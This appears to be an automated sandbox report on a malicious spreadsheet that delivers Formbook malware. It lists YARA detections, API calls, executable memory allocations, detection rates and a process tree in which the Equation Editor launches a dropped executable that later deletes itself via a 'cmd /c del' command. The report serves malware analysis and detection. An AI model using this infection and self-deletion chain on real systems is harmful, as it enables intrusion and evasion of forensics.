          Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_0040604C
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00404772
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00401026
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041E261
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041EB71
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041E3DA
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041E4B4
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00409E4B
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00409E50
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041EEB5
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041D7DE
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041E79A
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0099E0C6
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009CD005
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009B905A
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A1D06D
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009A3040
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0099E2E9
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A41238
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A463BF
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009C63DB
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0099F3CF
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009A2305
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009A7353
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009EA37B
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009B1489
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009D5485
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A2443E
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009DD47D
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A205E3
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009BC5F0
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009A351F
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009E6540
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009A4680
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009AE6C1
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A42622
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009EA634
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009AC7BC
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A2579A
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009D57C3
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A3F8EE
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A1F8C4
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009AC85C
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009C286D
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009A29B2
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A4098E
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009B69FE
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A2394B
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A25955
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A53A83
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A4CBA4
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0099FBD7
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A26BCB
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00A2DBDA
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009C7B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023A1238
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022FE2E9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02302305
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0234A37B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02307353
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023A63BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022FF3CF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023263DB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0232D005
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231905A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02303040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022FE0C6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0234A634
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023A2622
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02304680
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0230E6C1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0230C7BC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0238579A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023357C3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0233D47D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02335485
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02311489
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0230351F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02346540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231C5F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023B3A83
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02327B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023ACBA4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0238DBDA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022FFBD7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0232286D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0230C85C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0239F8EE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02385955
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023029B2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023A098E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023169FE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02332E2F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231EE4C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02310F3F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0232DF7C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0239CFB1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02330D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0230CD5B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0239FDDD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008E79A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008D7DE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008EB71
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00072D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00079E4B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00079E50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008EEB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00072FB0
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 0099DF5C appears 95 times
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 00A0F970 appears 60 times
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 0099E2A8 appears 31 times
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 009E373B appears 185 times
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 009E3F92 appears 85 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 02343F92 appears 132 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0234373B appears 238 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 022FE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0236F970 appears 83 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 022FDF5C appears 119 times
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041A350 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041A400 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041A480 NtClose,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041A34A NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041A3FB NtReadFile,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041A47B NtClose,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009900C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00990048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00990078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009910D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00990060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009901D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0099010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00991148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009907AC NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00991930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0098FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022EFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022F1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A350 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A400 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A480 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A530 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A34A NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A3FB NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A47B NtClose,
          Source: 5C24.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dll 9679F0E8F63974D80F953B8212B2668C27EC9762CDCF6ACBFD4FDF4B6D189F23
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76E90000 page execute and read and write
          Source: HME AG PO 2091.xlsxVirustotal: Detection: 42%
          Source: HME AG PO 2091.xlsxReversingLabs: Detection: 32%
          Source: C:\Users\user\AppData\Roaming\word.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\word.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\word.exe"
          Source: C:\Users\user\AppData\Roaming\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$HME AG PO 2091.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREA4E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/9@3/3
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
